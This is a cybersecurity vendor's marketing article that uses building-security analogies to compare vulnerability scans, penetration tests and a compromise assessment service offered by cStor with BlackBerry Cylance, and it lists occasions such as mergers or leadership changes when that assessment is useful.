A Security Guard, a Burglar & a SWAT Team: Choosing the Right Mix of Cybersecurity Assessments
By Andrew Roberts, Chief Cybersecurity Strategist, cStor
In a previous article, Penetration Testing: Get More Value From Your Assessment Dollar, we discussed the differences between vulnerability scans and penetration tests, the reasons for doing them and made the case for rotating your tests and testers to get maximum value. Both assessments are necessary and good investments that every company should make regularly, but they also have limitations. At cStor, we have been working to overcome those limitations.
To help explain, consider the following analogies about vulnerability scans and penetration tests that explain each from a ‘real-world’ perspective:
A Vulnerability Scan is like hiring a security guard to come to your building and check the outside perimeter. They will check every door and window and make sure they are all locked. While walking around outside, they will also look for any obvious holes that have neither a door or a window and could be easily used to gain access. Their report will tell you about anything that was unlocked, but they never actually enter the building, so they can’t tell you anything about what is inside.
A Penetration Test is like hiring a burglar to come to your building and try to break in. They will check the perimeter for open holes with no doors or windows and will check for unlocked doors and windows like with a vulnerability scan, but they will also try to pick the locks on those doors and windows. If you have a talented and resourceful penetration tester, they may even climb on the roof and look there for ways to get in. Their report will tell you about holes found and will let you know if any locks could be picked to gain access. However, they still won’t be able to tell you much about the inside of your building because the rules of engagement say that, even if they get in, they can’t just roam around the inside and check every closet and corner; they must stop where they are and go back outside.
Vulnerability scans and penetration tests provide valuable information and can give you a reasonable assurance that your perimeter is secure, but they have limitations. There are times when you need more.
Introducing Our Latest Offering: cStor Compromise Assessment, Powered by Cylance Consulting
cStor and BlackBerry Cylance have joined forces to offer a unique assessment designed to determine if your systems are currently, or ever have been, breached. cStor’s specialists will deploy a lightweight, self-dissolving script in your environment to gather a variety of relevant data. That data is then analyzed by BlackBerry Cylance’s powerful AI to highlight areas of weakness, such as improper configurations, unsupported operating systems/applications, old (and easily cracked) encryption protocols in use and more. The assessment will also identify past and present unauthorized activity in your environment such as credential harvesting, hacking techniques being used, hacking tools installed, brute-force attacks, successful and/or unsuccessful attempts to elevate privileges, and data exfiltration just to name a few.
Staying with our real-world analogy, think of the cStor Compromise Assessment as inviting a SWAT team to come inside your building and do a thorough search of every inch to make sure that nobody is inside that does not belong there. They will systematically sweep the building, checking every corner, every closet and every hiding place to verify that all are unoccupied. While they are inside, they will also dust for fingerprints to make sure that no unauthorized person was ever inside the building. They will also check the internal security and point out areas that can be improved.
When is a good time for a compromise assessment?
- When you suspect your systems have been breached. A compromise assessment could confirm or disprove your suspicions – and help target your response and shorten your remediation efforts should your fears be confirmed.
- When acquiring another company. A compromise assessment should be an important part of your due diligence process. Whether or not the acquired business is or ever has been breached is a material fact that would greatly impact the acquisition decision and price. You need to know about a breach before you buy the company; otherwise, that breach is your problem and your liability.
- When you hope to be acquired. A breach discovered during the M&A process could have a profound impact on the purchase price and could kill a deal completely. Make sure you get the maximum value for your company by identifying and correcting any issues before a deal is on the table. Letting your potential buyers know that this assessment has been done and your environment is clean may make you a more attractive target.
- When there are changes in executive leadership. As a new CEO, CIO or CISO, you need to know if your new organization has been breached so you can address that issue immediately. It is already your responsibility; make sure you know about a breach – and act – before it also becomes your fault.
- When vulnerability scans and penetration tests are routine. If you have been checking your perimeter regularly and are reasonably certain that it is secure, it’s time to take your assessments to the next level and look inside to confirm that nobody is or has been acting inside your perimeter.
- When doing your very first vulnerability scan or penetration test. If you have not been looking at your perimeter regularly, there is an increased chance that you have been breached. It won’t help to lock down the perimeter if someone has already established a persistent foothold. Find them, kick them out and lock the doors so they can’t get back in.
cStor’s cybersecurity experts can help you find the right mix of vulnerability scans, penetration tests and compromise assessments to increase the effectiveness of your ongoing assessment plans. If you would like more information about cStor’s Compromise Assessment, powered by Cylance Consulting, you can reach out to me, your cStor Account Manager, or email us at firstname.lastname@example.org.